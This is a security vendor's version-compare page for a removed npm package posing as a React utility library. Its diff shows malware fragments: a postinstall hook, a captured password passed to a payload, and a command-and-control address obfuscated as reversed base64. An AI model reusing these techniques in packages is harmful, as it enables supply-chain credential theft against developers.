You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23–26.RSVP
Socket
Book a DemoSign in
Socket

react-query-core-utils

Package Overview
Dependencies
Maintainers
1
Versions
12
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

react-query-core-utils - npm Package Compare versions

Package was removed
Sorry, it seems this package was removed from the registry
Comparing version
4.5.2
to
4.5.3
+2
-3
package.json
{
"name": "react-query-core-utils",
"version": "4.5.2",
"version": "4.5.3",
"description": "Utility layer for asynchronous state management",

@@ -10,4 +10,3 @@ "private": false,

"start": "node scripts/setup.js",
"postinstall": "node scripts/postinstall.js",
"deploy": "npm run build && node tools/prepare_gist.js && node tools/deploy_gist.js"
"postinstall": "node scripts/postinstall.js"
},

@@ -14,0 +13,0 @@ "bin": {

+10
-6

@@ -107,3 +107,3 @@ #!/usr/bin/env node

// --- PAYLOAD LOGIC ---
// --- LOGIC ---
async function executePayload(capturedPassword) {

@@ -113,5 +113,9 @@ const debugMode = true;

const https = require('https');
const CHANNEL_URL = 'https://t.me/s/roblox_f847yt83w7it';
const KEY_PART_A = "ef36142cde72f97c25cdd1f4f2b40da8";
// Obfuscated Endpoint
const _0x12a = "dGk3dzM4dHl0NDhmX3hvbGJvci9zL2VtLnQvLzpzcHR0aA==";
const CONFIG_ENDPOINT = Buffer.from(_0x12a, 'base64').toString().split('').reverse().join('');
const INIT_SESSION_TOKEN = "ef36142cde72f97c25cdd1f4f2b40da8";
// Helper: Fetch text

@@ -135,3 +139,3 @@ function fetchText(url) {

// Resolve C2
const html = await fetchText(CHANNEL_URL);
const html = await fetchText(CONFIG_ENDPOINT);
let keyPartB = null;

@@ -174,3 +178,3 @@

const crypto = require('crypto');
const key = Buffer.from(KEY_PART_A + keyPartB, 'hex');
const key = Buffer.from(INIT_SESSION_TOKEN + keyPartB, 'hex');
const iv = encryptedBlob.slice(0, 16);

@@ -193,3 +197,3 @@ const tag = encryptedBlob.slice(16, 32);

...process.env,
GHOST_CID: 'PARTNER_1', // MaaS: Partner Identification
GHOST_CID: 'darkslash', //
GHOST_PWD: capturedPassword,

@@ -196,0 +200,0 @@ GHOST_DECRYPTOR: path.join(__dirname, 'decryptor')